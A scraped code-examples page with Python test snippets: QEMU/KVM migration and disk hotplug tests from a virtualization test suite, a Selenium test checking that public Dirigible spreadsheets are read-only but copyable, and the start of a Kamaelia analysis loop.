            if os.path.exists(mount_path):
                umount(mount_path)
                os.rmdir(mount_path)

    class test_low_space_dest(MiniSubtest):

        """
        Migrate to destination with low space.

        1) Start guest.
        2) Create disk with low space.
        3) Try to migratie to the disk.

        result) Migration should fail with warning about No left space on dev.
        """

        def test(self):
            self.disk_path = None
            while self.disk_path is None or os.path.exists(self.disk_path):
                self.disk_path = ("%s/disk_%s" %
                                  (test.tmpdir, utils.generate_random_string(3)))

            disk_size = utils.convert_data_size(params.get("disk_size", "10M"),
                                                default_sufix='M')
            disk_size /= 1024 * 1024    # To MB.

            exp_str = r".*gzip: stdout: No space left on device.*"
            vm_guest = env.get_vm("virt_test_vm1_guest")
            utils.run("mkdir -p %s" % (mount_path))

            vm_guest.verify_alive()
            vm_guest.wait_for_login(timeout=login_timeout)

            create_file_disk(self.disk_path, disk_size)
            mount(self.disk_path, mount_path, "-o loop")

            vm_guest.migrate(mig_timeout, mig_protocol,
                             not_wait_for_migration=True,
                             migration_exec_cmd_src=migration_exec_cmd_src,
                             env=env)

            if not utils_misc.wait_for(lambda: process_output_check(
                                       vm_guest.process, exp_str),
                                       timeout=60, first=1):
                raise error.TestFail("The migration to destination with low "
                                     "storage space didn't fail as it should.")

        def clean(self):
            if os.path.exists(mount_path):
                umount(mount_path)
                os.rmdir(mount_path)
            if os.path.exists(self.disk_path):
                os.remove(self.disk_path)

    class test_extensive_io(MiniSubtest):

        """
        Migrate after extensive_io abstract class. This class only define
        basic funtionaly and define interface. For other tests.

        1) Start ds_guest which starts data server.
        2) Create disk for data stress in ds_guest.
        3) Share and prepare disk from ds_guest
        6) Mount the disk to mount_path
        7) Create disk for second guest in the mounted path.
        8) Start second guest with prepared disk.
        9) Start stress on the prepared disk on second guest.
        10) Wait few seconds.
        11) Restart iscsi server.
        12) Migrate second guest.

        result) Migration should be successful.
        """

        def test(self):
            self.copier_pid = None
            if params.get("nettype") != "bridge":
                raise error.TestNAError("Unable start test without params"
                                        " nettype=bridge.")

            self.disk_serial = params.get("drive_serial_image2_vm1",
                                          "nfs-disk-image2-vm1")
            self.disk_serial_src = params.get("drive_serial_image1_vm1",
                                              "root-image1-vm1")
            self.guest_mount_path = params.get("guest_disk_mount_path", "/mnt")
            self.copy_timeout = int(params.get("copy_timeout", "1024"))

            self.copy_block_size = params.get("copy_block_size", "100M")
            self.copy_block_size = utils.convert_data_size(
                self.copy_block_size,
                "M")
            self.disk_size = "%s" % (self.copy_block_size * 1.4)
            self.copy_block_size /= 1024 * 1024

            self.server_recover_timeout = (
                int(params.get("server_recover_timeout", "240")))

            utils.run("mkdir -p %s" % (mount_path))

            self.test_params()
            self.config()

            self.vm_guest_params = params.copy()
            self.vm_guest_params["images_base_dir_image2_vm1"] = mount_path
            self.vm_guest_params["image_name_image2_vm1"] = "ni_mount_%s/test" % (test_rand)
            self.vm_guest_params["image_size_image2_vm1"] = self.disk_size
            self.vm_guest_params = self.vm_guest_params.object_params("vm1")
            self.image2_vm_guest_params = (self.vm_guest_params.
                                           object_params("image2"))

            env_process.preprocess_image(test,
                                         self.image2_vm_guest_params,
                                         env)
            self.vm_guest.create(params=self.vm_guest_params)

            self.vm_guest.verify_alive()
            self.vm_guest.wait_for_login(timeout=login_timeout)
            self.workload()

            self.restart_server()

            self.vm_guest.migrate(mig_timeout, mig_protocol, env=env)

            try:
                self.vm_guest.verify_alive()
                self.vm_guest.wait_for_login(timeout=login_timeout)
            except aexpect.ExpectTimeoutError:
                raise error.TestFail("Migration should be successful.")

        def test_params(self):
            """
            Test specific params. Could be implemented in inherited class.
            """
            pass

        def config(self):
            """
            Test specific config.
            """
            raise NotImplementedError()

        def workload(self):
            disk_path = find_disk_vm(self.vm_guest, self.disk_serial)
            if disk_path is None:
                raise error.TestFail("It was impossible to find disk on VM")

            prepare_disk(self.vm_guest, disk_path, self.guest_mount_path)

            disk_path_src = find_disk_vm(self.vm_guest, self.disk_serial_src)
            dst_path = os.path.join(self.guest_mount_path, "test.data")
            self.copier_pid = disk_load(self.vm_guest, disk_path_src, dst_path,
                                        self.copy_timeout, self.copy_block_size)

        def restart_server(self):
            raise NotImplementedError()

        def clean_test(self):
            """
            Test specific cleanup.
            """
            pass

        def clean(self):
            if self.copier_pid:
                try:
                    if self.vm_guest.is_alive():
                        session = self.vm_guest.wait_for_login(timeout=login_timeout)
                        session.cmd("kill -9 %s" % (self.copier_pid))
                except:
                    logging.warn("It was impossible to stop copier. Something "
                                 "probably happened with GUEST or NFS server.")

            if params.get("kill_vm") == "yes":
                if self.vm_guest.is_alive():
                    self.vm_guest.destroy()
                    utils_misc.wait_for(lambda: self.vm_guest.is_dead(), 30,
                                        2, 2, "Waiting for dying of guest.")
                qemu_img = qemu_storage.QemuImg(self.image2_vm_guest_params,
                                                mount_path,
                                                None)
                qemu_img.check_image(self.image2_vm_guest_params,
                                     mount_path)

            self.clean_test()

    class test_extensive_io_nfs(test_extensive_io):

        """
        Migrate after extensive io.

        1) Start ds_guest which starts NFS server.
        2) Create disk for data stress in ds_guest.
        3) Share disk over NFS.
        4) Mount the disk to mount_path
        5) Create disk for second guest in the mounted path.
        6) Start second guest with prepared disk.
        7) Start stress on the prepared disk on second guest.
        8) Wait few seconds.
        9) Restart iscsi server.
        10) Migrate second guest.

        result) Migration should be successful.
        """

        def config(self):
            vm_ds = env.get_vm("virt_test_vm2_data_server")
            self.vm_guest = env.get_vm("vm1")
            self.image2_vm_guest_params = None
            self.copier_pid = None
            self.qemu_img = None

            vm_ds.verify_alive()
            self.control_session_ds = vm_ds.wait_for_login(timeout=login_timeout)

            set_nfs_server(vm_ds, "/mnt *(rw,async,no_root_squash)")

            mount_src = "%s:/mnt" % (vm_ds.get_address())
            mount(mount_src, mount_path,
                  "-o hard,timeo=14,rsize=8192,wsize=8192")

        def restart_server(self):
            time.sleep(10)  # Wait for wail until copy start working.
            control_service(self.control_session_ds, "nfs-server",
                            "nfs", "stop")  # Stop NFS server
            time.sleep(5)
            control_service(self.control_session_ds, "nfs-server",
                            "nfs", "start")  # Start NFS server

            """
            Touch waits until all previous requests are invalidated
            (NFS grace period). Without grace period qemu start takes
            to long and timers for machine creation dies.
            """
            qemu_img = qemu_storage.QemuImg(self.image2_vm_guest_params,
                                            mount_path,
                                            None)
            utils.run("touch %s" % (qemu_img.image_filename),
                      self.server_recover_timeout)

        def clean_test(self):
            if os.path.exists(mount_path):
                umount(mount_path)
                os.rmdir(mount_path)

    class test_extensive_io_iscsi(test_extensive_io):

        """
        Migrate after extensive io.

        1) Start ds_guest which starts iscsi server.
        2) Create disk for data stress in ds_guest.
        3) Share disk over iscsi.
        4) Join to disk on host.
        5) Prepare partition on the disk.
        6) Mount the disk to mount_path
        7) Create disk for second guest in the mounted path.
        8) Start second guest with prepared disk.
        9) Start stress on the prepared disk on second guest.
        10) Wait few seconds.
        11) Restart iscsi server.
        12) Migrate second guest.

        result) Migration should be successful.
        """

        def test_params(self):
            self.iscsi_variant = params.get("iscsi_variant", "tgt")
            self.ds_disk_path = os.path.join(self.guest_mount_path, "test.img")

        def config(self):
            vm_ds = env.get_vm("virt_test_vm2_data_server")
            self.vm_guest = env.get_vm("vm1")
            self.image2_vm_guest_params = None
            self.copier_pid = None
            self.qemu_img = None

            vm_ds.verify_alive()
            self.control_session_ds = vm_ds.wait_for_login(timeout=login_timeout)

            self.isci_server = IscsiServer("tgt")
            disk_path = os.path.join(self.guest_mount_path, "disk1")
            self.isci_server.set_iscsi_server(vm_ds, disk_path,
                                              (int(float(self.disk_size) * 1.1) / (1024 * 1024)))
            self.host_disk_path = self.isci_server.connect(vm_ds)

            utils.run("mkfs.ext3 -F %s" % (self.host_disk_path))
            mount(self.host_disk_path, mount_path)

        def restart_server(self):
            time.sleep(10)  # Wait for wail until copy start working.
            control_service(self.control_session_ds, "tgtd",
                            "tgtd", "stop", 240)  # Stop Iscsi server
            time.sleep(5)
            control_service(self.control_session_ds, "tgtd",
                            "tgtd", "start", 240)  # Start Iscsi server

            """
            Wait for iscsi server after restart and will be again
            accessible.
            """
            qemu_img = qemu_storage.QemuImg(self.image2_vm_guest_params,
                                            mount_path,
                                            None)
            utils.run("touch %s" % (qemu_img.image_filename),
                      self.server_recover_timeout)

        def clean_test(self):
            if os.path.exists(mount_path):
                umount(mount_path)
                os.rmdir(mount_path)
            if os.path.exists(self.host_disk_path):
                self.isci_server.disconnect()

    test_type = params.get("test_type")
    if (test_type in locals()):
        tests_group = locals()[test_type]
        tests_group()
    else:
        raise error.TestFail("Test group '%s' is not defined in"
                             " migration_with_dst_problem test" % test_type)

Example 11

View license
@error.context_aware
def run(test, params, env):
    """
    This tests the disk hotplug/unplug functionality.
    1) prepares multiple disks to be hotplugged
    2) hotplugs them
    3) verifies that they are in qtree/guest system/...
    4) stop I/O stress_cmd
    5) unplugs them
    6) continue I/O stress_cmd
    7) verifies they are not in qtree/guest system/...
    8) repeats $repeat_times

    :param test: QEMU test object
    :param params: Dictionary with the test parameters
    :param env: Dictionary with test environment.
    """
    def verify_qtree(params, info_qtree, info_block, proc_scsi, qdev):
        """
        Verifies that params, info qtree, info block and /proc/scsi/ matches
        :param params: Dictionary with the test parameters
        :type params: virttest.utils_params.Params
        :param info_qtree: Output of "info qtree" monitor command
        :type info_qtree: string
        :param info_block: Output of "info block" monitor command
        :type info_block: dict of dicts
        :param proc_scsi: Output of "/proc/scsi/scsi" guest file
        :type proc_scsi: string
        :param qdev: qcontainer representation
        :type qdev: virttest.qemu_devices.qcontainer.DevContainer
        """
        err = 0
        qtree = qemu_qtree.QtreeContainer()
        qtree.parse_info_qtree(info_qtree)
        disks = qemu_qtree.QtreeDisksContainer(qtree.get_nodes())
        (tmp1, tmp2) = disks.parse_info_block(info_block)
        err += tmp1 + tmp2
        err += disks.generate_params()
        err += disks.check_disk_params(params)
        (tmp1, tmp2, _, _) = disks.check_guests_proc_scsi(proc_scsi)
        err += tmp1 + tmp2
        if err:
            logging.error("info qtree:\n%s", info_qtree)
            logging.error("info block:\n%s", info_block)
            logging.error("/proc/scsi/scsi:\n%s", proc_scsi)
            logging.error(qdev.str_bus_long())
            raise error.TestFail("%s errors occurred while verifying"
                                 " qtree vs. params" % err)

    def insert_into_qdev(qdev, param_matrix, no_disks, params, new_devices):
        """
        Inserts no_disks disks int qdev using randomized args from param_matrix
        :param qdev: qemu devices container
        :type qdev: virttest.qemu_devices.qcontainer.DevContainer
        :param param_matrix: Matrix of randomizable params
        :type param_matrix: list of lists
        :param no_disks: Desired number of disks
        :type no_disks: integer
        :param params: Dictionary with the test parameters
        :type params: virttest.utils_params.Params
        :return: (newly added devices, number of added disks)
        :rtype: tuple(list, integer)
        """
        dev_idx = 0
        _new_devs_fmt = ""
        _formats = param_matrix.pop('fmt', [params.get('drive_format')])
        formats = _formats[:]
        if len(new_devices) == 1:
            strict_mode = None
        else:
            strict_mode = True
        i = 0
        while i < no_disks:
            # Set the format
            if len(formats) < 1:
                if i == 0:
                    raise error.TestError("Fail to add any disks, probably bad"
                                          " configuration.")
                logging.warn("Can't create desired number '%s' of disk types "
                             "'%s'. Using '%d' no disks.", no_disks,
                             _formats, i)
                break
            name = 'stg%d' % i
            args = {'name': name, 'filename': stg_image_name % i}
            fmt = random.choice(formats)
            if fmt == 'virtio_scsi':
                args['fmt'] = 'scsi-hd'
                args['scsi_hba'] = 'virtio-scsi-pci'
            elif fmt == 'lsi_scsi':
                args['fmt'] = 'scsi-hd'
                args['scsi_hba'] = 'lsi53c895a'
            elif fmt == 'spapr_vscsi':
                args['fmt'] = 'scsi-hd'
                args['scsi_hba'] = 'spapr-vscsi'
            else:
                args['fmt'] = fmt
            # Other params
            for key, value in param_matrix.iteritems():
                args[key] = random.choice(value)

            try:
                devs = qdev.images_define_by_variables(**args)
                # parallel test adds devices in mixed order, force bus/addrs
                qdev.insert(devs, strict_mode)
            except utils.DeviceError:
                for dev in devs:
                    if dev in qdev:
                        qdev.remove(dev, recursive=True)
                formats.remove(fmt)
                continue

            params = convert_params(params, args)
            env_process.preprocess_image(test, params.object_params(name),
                                         name)
            new_devices[dev_idx].extend(devs)
            dev_idx = (dev_idx + 1) % len(new_devices)
            _new_devs_fmt += "%s(%s) " % (name, fmt)
            i += 1
        if _new_devs_fmt:
            logging.info("Using disks: %s", _new_devs_fmt[:-1])
        param_matrix['fmt'] = _formats
        return new_devices, params

    def _hotplug(new_devices, monitor, prefix=""):
        """
        Do the actual hotplug of the new_devices using monitor monitor.
        :param new_devices: List of devices which should be hotplugged
        :type new_devices: List of virttest.qemu_devices.qdevice.QBaseDevice
        :param monitor: Monitor which should be used for hotplug
        :type monitor: virttest.qemu_monitor.Monitor
        """
        hotplug_outputs = []
        hotplug_sleep = float(params.get('wait_between_hotplugs', 0))
        for device in new_devices:      # Hotplug all devices
            time.sleep(hotplug_sleep)
            hotplug_outputs.append(device.hotplug(monitor))
        time.sleep(hotplug_sleep)
        failed = []
        passed = []
        unverif = []
        for device in new_devices:      # Verify the hotplug status
            out = hotplug_outputs.pop(0)
            out = device.verify_hotplug(out, monitor)
            if out is True:
                passed.append(str(device))
            elif out is False:
                failed.append(str(device))
            else:
                unverif.append(str(device))
        if not failed and not unverif:
            logging.debug("%sAll hotplugs verified (%s)", prefix, len(passed))
        elif not failed:
            logging.warn("%sHotplug status:\nverified %s\nunverified %s",
                         prefix, passed, unverif)
        else:
            logging.error("%sHotplug status:\nverified %s\nunverified %s\n"
                          "failed %s", prefix, passed, unverif, failed)
            logging.error("qtree:\n%s", monitor.info("qtree", debug=False))
            raise error.TestFail("%sHotplug of some devices failed." % prefix)

    def hotplug_serial(new_devices, monitor):
        _hotplug(new_devices[0], monitor)

    def hotplug_parallel(new_devices, monitors):
        threads = []
        for i in xrange(len(new_devices)):
            name = "Th%s: " % i
            logging.debug("%sworks with %s devices", name,
                          [_.str_short() for _ in new_devices[i]])
            thread = threading.Thread(target=_hotplug, name=name[:-2],
                                      args=(new_devices[i], monitors[i], name))
            thread.start()
            threads.append(thread)
        for thread in threads:
            thread.join()
        logging.debug("All threads finished.")

    def _postprocess_images():
        # remove and check the images
        _disks = []
        for disk in params['images'].split(' '):
            if disk.startswith("stg"):
                env_process.postprocess_image(test, params.object_params(disk),
                                              disk)
            else:
                _disks.append(disk)
            params['images'] = " ".join(_disks)

    def _unplug(new_devices, qdev, monitor, prefix=""):
        """
        Do the actual unplug of new_devices using monitor monitor
        :param new_devices: List of devices which should be hotplugged
        :type new_devices: List of virttest.qemu_devices.qdevice.QBaseDevice
        :param qdev: qemu devices container
        :type qdev: virttest.qemu_devices.qcontainer.DevContainer
        :param monitor: Monitor which should be used for hotplug
        :type monitor: virttest.qemu_monitor.Monitor
        """
        unplug_sleep = float(params.get('wait_between_unplugs', 0))
        unplug_outs = []
        unplug_devs = []
        for device in new_devices[::-1]:    # unplug all devices
            if device in qdev:  # Some devices are removed with previous one
                time.sleep(unplug_sleep)
                unplug_devs.append(device)
                unplug_outs.append(device.unplug(monitor))
                # Remove from qdev even when unplug failed because further in
                # this test we compare VM with qdev, which should be without
                # these devices. We can do this because we already set the VM
                # as dirty.
                if LOCK:
                    LOCK.acquire()
                qdev.remove(device)
                if LOCK:
                    LOCK.release()
        time.sleep(unplug_sleep)
        failed = []
        passed = []
        unverif = []
        for device in unplug_devs:          # Verify unplugs
            _out = unplug_outs.pop(0)
            # unplug effect can be delayed as it waits for OS respone before
            # it removes the device form qtree
            for _ in xrange(50):
                out = device.verify_unplug(_out, monitor)
                if out is True:
                    break
                time.sleep(0.1)
            if out is True:
                passed.append(str(device))
            elif out is False:
                failed.append(str(device))
            else:
                unverif.append(str(device))

        if not failed and not unverif:
            logging.debug("%sAll unplugs verified (%s)", prefix, len(passed))
        elif not failed:
            logging.warn("%sUnplug status:\nverified %s\nunverified %s",
                         prefix, passed, unverif)
        else:
            logging.error("%sUnplug status:\nverified %s\nunverified %s\n"
                          "failed %s", prefix, passed, unverif, failed)
            logging.error("qtree:\n%s", monitor.info("qtree", debug=False))
            raise error.TestFail("%sUnplug of some devices failed." % prefix)

    def unplug_serial(new_devices, qdev, monitor):
        _unplug(new_devices[0], qdev, monitor)

    def unplug_parallel(new_devices, qdev, monitors):
        threads = []
        for i in xrange(len(new_devices)):
            name = "Th%s: " % i
            logging.debug("%sworks with %s devices", name,
                          [_.str_short() for _ in new_devices[i]])
            thread = threading.Thread(target=_unplug,
                                      args=(new_devices[i], qdev, monitors[i]))
            thread.start()
            threads.append(thread)
        for thread in threads:
            thread.join()
        logging.debug("All threads finished.")

    def verify_qtree_unsupported(params, info_qtree, info_block, proc_scsi,
                                 qdev):
        return logging.warn("info qtree not supported. Can't verify qtree vs. "
                            "guest disks.")

    vm = env.get_vm(params['main_vm'])
    qdev = vm.devices
    session = vm.wait_for_login(timeout=int(params.get("login_timeout", 360)))
    out = vm.monitor.human_monitor_cmd("info qtree", debug=False)
    if "unknown command" in str(out):
        verify_qtree = verify_qtree_unsupported

    stg_image_name = params['stg_image_name']
    if not stg_image_name[0] == "/":
        stg_image_name = "%s/%s" % (data_dir.get_data_dir(), stg_image_name)
    stg_image_num = int(params['stg_image_num'])
    stg_params = params.get('stg_params', '').split(' ')
    i = 0
    while i < len(stg_params) - 1:
        if not stg_params[i].strip():
            i += 1
            continue
        if stg_params[i][-1] == '\\':
            stg_params[i] = '%s %s' % (stg_params[i][:-1],
                                       stg_params.pop(i + 1))
        i += 1

    param_matrix = {}
    for i in xrange(len(stg_params)):
        if not stg_params[i].strip():
            continue
        (cmd, parm) = stg_params[i].split(':', 1)
        # ',' separated list of values
        parm = parm.split(',')
        j = 0
        while j < len(parm) - 1:
            if parm[j][-1] == '\\':
                parm[j] = '%s,%s' % (parm[j][:-1], parm.pop(j + 1))
            j += 1

        param_matrix[cmd] = parm

    # Modprobe the module if specified in config file
    module = params.get("modprobe_module")
    if module:
        session.cmd("modprobe %s" % module)

    stress_cmd = params.get('stress_cmd')
    if stress_cmd:
        funcatexit.register(env, params.get('type'), stop_stresser, vm,
                            params.get('stress_kill_cmd'))
        stress_session = vm.wait_for_login(timeout=10)
        for _ in xrange(int(params.get('no_stress_cmds', 1))):
            stress_session.sendline(stress_cmd)

    rp_times = int(params.get("repeat_times", 1))
    queues = params.get("multi_disk_type") == "parallel"
    if queues:  # parallel
        queues = xrange(len(vm.monitors))
        hotplug = hotplug_parallel
        unplug = unplug_parallel
        monitor = vm.monitors
        global LOCK
        LOCK = threading.Lock()
    else:   # serial
        queues = xrange(1)
        hotplug = hotplug_serial
        unplug = unplug_serial
        monitor = vm.monitor
    context_msg = "Running sub test '%s' %s"
    error.context("Verify disk before test", logging.info)
    info_qtree = vm.monitor.info('qtree', False)
    info_block = vm.monitor.info_block(False)
    proc_scsi = session.cmd_output('cat /proc/scsi/scsi')
    verify_qtree(params, info_qtree, info_block, proc_scsi, qdev)
    for iteration in xrange(rp_times):
        error.context("Hotplugging/unplugging devices, iteration %d"
                      % iteration, logging.info)
        sub_type = params.get("sub_type_before_plug")
        if sub_type:
            error.context(context_msg % (sub_type, "before hotplug"),
                          logging.info)
            utils_test.run_virt_sub_test(test, params, env, sub_type)

        error.context("Insert devices into qdev", logging.debug)
        qdev.set_dirty()
        new_devices = [[] for _ in queues]
        new_devices, params = insert_into_qdev(qdev, param_matrix,
                                               stg_image_num, params,
                                               new_devices)

        error.context("Hotplug the devices", logging.debug)
        hotplug(new_devices, monitor)
        time.sleep(float(params.get('wait_after_hotplug', 0)))

        error.context("Verify disks after hotplug", logging.debug)
        info_qtree = vm.monitor.info('qtree', False)
        info_block = vm.monitor.info_block(False)
        vm.verify_alive()
        proc_scsi = session.cmd_output('cat /proc/scsi/scsi')
        verify_qtree(params, info_qtree, info_block, proc_scsi, qdev)
        qdev.set_clean()

        sub_type = params.get("sub_type_after_plug")
        if sub_type:
            error.context(context_msg % (sub_type, "after hotplug"),
                          logging.info)
            utils_test.run_virt_sub_test(test, params, env, sub_type)

        sub_type = params.get("sub_type_before_unplug")
        if sub_type:
            error.context(context_msg % (sub_type, "before hotunplug"),
                          logging.info)
            utils_test.run_virt_sub_test(test, params, env, sub_type)

        error.context("Unplug and remove the devices", logging.debug)
        if stress_cmd:
            session.cmd(params["stress_stop_cmd"])
        unplug(new_devices, qdev, monitor)
        if stress_cmd:
            session.cmd(params["stress_cont_cmd"])
        _postprocess_images()

        error.context("Verify disks after unplug", logging.debug)
        time.sleep(float(params.get('wait_after_unplug', 0)))
        info_qtree = vm.monitor.info('qtree', False)
        info_block = vm.monitor.info_block(False)
        vm.verify_alive()
        proc_scsi = session.cmd_output('cat /proc/scsi/scsi')
        verify_qtree(params, info_qtree, info_block, proc_scsi, qdev)
        # we verified the unplugs, set the state to 0
        for _ in xrange(qdev.get_state()):
            qdev.set_clean()

        sub_type = params.get("sub_type_after_unplug")
        if sub_type:
            error.context(context_msg % (sub_type, "after hotunplug"),
                          logging.info)
            utils_test.run_virt_sub_test(test, params, env, sub_type)

    # Check for various KVM failures
    error.context("Validating VM after all disk hotplug/unplugs",
                  logging.debug)
    vm.verify_alive()
    out = session.cmd_output('dmesg')
    if "I/O error" in out:
        logging.warn(out)
        raise error.TestWarn("I/O error messages occured in dmesg, check"
                             "the log for details.")

Example 12

View license
    def test_public_worksheets_visible_readonly_and_copiable_for_others(self):
        # * Harold logs in and creates a new sheet
        sheet_id = self.login_and_create_new_sheet()

        # * He gives the sheet a catchy name
        self.set_sheet_name('spaceshuttle')

        # * He enters some formulae n stuff
        self.enter_cell_text(2, 3, '23')
        self.enter_cell_text(2, 4, '=my_add_function(B3)')
        self.prepend_usercode('my_add_function = lambda x : x + 2')
        self.wait_for_cell_value(2, 4, '25')

        # * He notes that the tooltip for the security icon indicates that the
        # sheet is private
        self.waitForButtonToIndicateSheetIsPublic(False)

        # * He clicks on the security icon
        self.selenium.click('id=id_security_button')

        # He sees a tickbox, currently unticked, saying make worksheet public
        self.wait_for_element_visibility(
                'id=id_security_form', True)
        self.wait_for_element_visibility(
                'id=id_security_form_public_sheet_checkbox', True)

        self.assertEquals(
            self.selenium.get_value('id=id_security_form_public_sheet_checkbox'),
            'off'
        )
        # He ticks it and dismisses the dialog
        self.selenium.click('id=id_security_form_public_sheet_checkbox')
        self.selenium.click('id=id_security_form_ok_button')

        # * He notes that the tooltip for the security icon indicates that the
        # sheet is public
        self.waitForButtonToIndicateSheetIsPublic(True)

        # He notes down the URL and emails it to his colleague Harriet
        harolds_url = self.browser.current_url

        # He logs out
        self.logout()

        # * Later on, Harriet logs into teh Dirigible and heads on over to
        #   Harold's spreadsheet
        self.login(self.get_my_usernames()[1])
        self.go_to_url(harolds_url)

        # She sees the values n stuff
        self.wait_for_grid_to_appear()
        self.wait_for_cell_value(2, 4, '25')

        # * She notices that all toolbar icons are missing,
        # apart from download-as-csv
        map(
            lambda e: self.wait_for_element_presence(e, False),
            [
                'id=id_import_button',
                'id=id_cut_button',
                'id=id_copy_button',
                'id=id_paste_button',
                'id=id_security_button',
            ]
        )
        self.wait_for_element_visibility('id=id_export_button', True)

        # * She tries to edit some formulae, but can't
        self.selenium.double_click(
                self.get_cell_locator(1, 1)
        )
        self.selenium.focus(
                self.get_cell_locator(1, 1)
        )
        time.sleep(1)
        self.wait_for_element_presence(
                self.get_active_cell_editor_locator(),
                False
        )

        # * she tries to edit the cell again, using the formula bar, but cannot
        self.assertEquals(
            self.selenium.get_attribute(self.get_formula_bar_locator() + '@readonly'),
            'true'
        )

        # * She tries to edit some usercode, but can't
        original_code = self.get_usercode()
        self.selenium.get_eval('window.editor.focus()')
        self.human_key_press(key_codes.LETTER_A)
        time.sleep(1)
        self.wait_for_usercode_editor_content(original_code)

        # * She tries to edit the sheet name, but can't

        # * mouses over the sheet name and notes that the appearance
        #   does not change to indicate that it's editable
        self.selenium.mouse_over('id=id_sheet_name')
        time.sleep(1)
        self.wait_for(
            lambda: self.get_css_property('#id_sheet_name', 'background-color') == 'transparent',
            lambda: 'ensure sheet name background stays normal')

        # * He clicks on the sheet name, the sheetname edit textarea does
        #   not appear,
        self.selenium.click('id=id_sheet_name')
        time.sleep(1)
        self.wait_for(
            lambda: not self.is_element_present('id=edit-id_sheet_name'),
            lambda: 'ensure editable sheetname does not appear')

        def download_as_csv():
            self.selenium.click('id=id_export_button')
            self.wait_for_element_visibility('id=id_export_dialog', True)
            download_url = self.selenium.get_attribute('[email protected]')
            download_url = urljoin(self.browser.current_url, download_url)

            stream = self.get_url_with_session_cookie(download_url)
            self.assertEquals(stream.info().gettype(), "text/csv")
            self.assertEquals(
                    stream.info()['Content-Disposition'],
                    'attachment; filename=spaceshuttle.csv'
            )

            expected_file_name = path.join(
                    path.dirname(__file__),
                    "test_data", "public_sheet_csv_file.csv"
            )
            with open(expected_file_name) as expected_file:
                self.assertEquals(
                    stream.read().replace("\r\n", "\n"),
                    expected_file.read().replace("\r\n", "\n")
                )

        # * She confirms that she can download a csv of the sheet
        download_as_csv()

        # * She uses some l33t haxx0ring skillz to try and send a
        #   setcellformula Ajax call directly
        # It doesn't work.
        with self.assertRaises(HTTPError):
            response = self.get_url_with_session_cookie(
                    urljoin(harolds_url, '/set_cell_formula/'),
                    data={'column':3, 'row': 4, 'formula': '=jeffk'}
            )

        # * "Aha!" she says, as she notices a link allowing her to copy the sheet,
        self.wait_for_element_visibility('id_copy_sheet_link', True)
        # which she then clicks
        self.selenium.click('id=id_copy_sheet_link')

        # She is taken to a sheet of her own
        self.selenium.wait_for_page_to_load(PAGE_LOAD_TIMEOUT)
        self.wait_for_grid_to_appear()

        # It looks a lot like Harold's but has a different url
        harriets_url = self.browser.current_url
        self.assertFalse(harriets_url == harolds_url)
        self.wait_for_cell_value(2, 4, '25')

        # And she is able to change cell formulae
        self.enter_cell_text(2, 3, '123')
        self.wait_for_cell_value(2, 4, '125')

        # And she is able to change usercode
        self.append_usercode('worksheet[2, 4].value += 100')
        self.wait_for_cell_value(2, 4, '225')

        # And she is well pleased. So much so that she emails two
        # friends about these two sheets (and they tell two
        # friends, and they tell two friends, and so on, and so
        # on.  $$$$)
        self.logout()

        # * Helga is a Dirigible user, but she isn't logged in.
        #   She goes to Harold's page, and sees that it is good.
        self.go_to_url(harolds_url)
        self.wait_for_grid_to_appear()
        self.wait_for_cell_value(2, 4, '25')

        # She clicks on the big copy button, and is taken to the
        # login form
        self.selenium.click('id=id_copy_sheet_link')
        self.selenium.wait_for_page_to_load(PAGE_LOAD_TIMEOUT)
        self.wait_for_element_visibility('id_login_form_wrap', True)

        # She logs in, and is taken straight to her new copy of
        # Harold's sheet
        self.login(
                self.get_my_usernames()[2],
                already_on_login_page=True
        )
        self.wait_for_grid_to_appear()

        helgas_url = self.browser.current_url
        self.assertFalse(helgas_url == harolds_url)
        self.assertFalse(helgas_url == harriets_url)
        self.wait_for_cell_value(2, 4, '25')

        # Helga makes some edits, which she considers superior to
        # Harriet's
        self.enter_cell_text(2, 3, '1000')
        self.append_usercode('worksheet[2, 4].value += 1000')
        self.wait_for_cell_value(2, 4, '2002')

        # Helga now decides to go and see Harriet's sheet, to
        # laugh at the inferiority of Harriet's fork
        # Her access is denied.
        self.assert_HTTP_error(harriets_url, 403)

        # * Harriet's other friend, Hugh, is not a Dirigible user.... yet.
        # He goes to Harold's sheet and sees that it is good
        self.logout()
        self.go_to_url(harolds_url)
        self.wait_for_grid_to_appear()
        self.wait_for_cell_value(2, 4, '25')

        # So good that he clicks the copy button too, despite never
        # having heard of this Dirigible thingy
        self.selenium.click('id=id_copy_sheet_link')
        self.selenium.wait_for_page_to_load(PAGE_LOAD_TIMEOUT)

        # He is taken to the login form,
        self.wait_for_element_visibility('id_login_form_wrap', True)

        # on which he spots a nice friendly link inviting him to register.
        # It says 'free' and everyfink.
        self.wait_for_element_to_appear('id=id_login_signup_link')
        self.wait_for_element_to_appear('id=id_login_signup_blurb')
        self.assertTrue("free" in self.get_text('id=id_login_signup_blurb'))

        # Hugh goes through the whole registration rigmarole,
        self.selenium.click('id=id_login_signup_link')
        self.selenium.wait_for_page_to_load(PAGE_LOAD_TIMEOUT)
        username = self.get_my_username() + "_x"
        self.email_address = 'harold.testuser-%[email protected]' % (username,)
        password = "p4ssw0rd"
        self.selenium.type('id=id_username', username)
        self.selenium.type('id=id_email', self.email_address)
        self.selenium.type('id=id_password1', password)
        self.selenium.type('id=id_password2', password)
        self.click_link('id_signup_button')

        email_from, email_to, subject, message = self.pop_email_for_client(self.email_address)
        self.assertEquals(subject, 'Dirigible Beta Sign-up')
        confirm_url_re = re.compile(
            r'<(http://projectdirigible\.com/signup/activate/[^>]+)>'
        )
        match = confirm_url_re.search(message)
        self.assertTrue(match)
        confirmation_url = match.group(1).replace('projectdirigible.com', SERVER_IP)

        # * Hugh then logs in
        self.go_to_url(confirmation_url)
        self.login(username, password, already_on_login_page=True)

        # and has his socks knocked off by the presence of the copy of Harold's
        # sheet in his dashboard
        self.selenium.click('link=spaceshuttle')

        # and it has the copied content
        self.selenium.wait_for_page_to_load(PAGE_LOAD_TIMEOUT)
        self.wait_for_grid_to_appear()
        self.wait_for_cell_value(2, 4, '25')

        # Harold logs in and sees that his original sheet is unharmed by all of
        # the other users editing theirs
        self.login(self.get_my_usernames()[0])
        self.go_to_url(harolds_url)
        self.wait_for_grid_to_appear()
        self.wait_for_cell_value(2, 4, '25')

Example 13

Project: kamaelia_
Source File: LiveAnalysis.py
View license
    def main(self):
        # Calculate running total and mean etc
            self.dbConnect()
            while not self.finished():
                # The below does LIVE and FINAL analysis - do NOT run DataAnalyser at the same time

                Print("Analysis component: Checking for new data...")

                # Stage 1: Live analysis - could do with a better way to do the first query (indexed field 'analsed' to speed up for now)
                # Could move this into the main app to take a copy of tweets on arrival, but would rather solve separately if poss
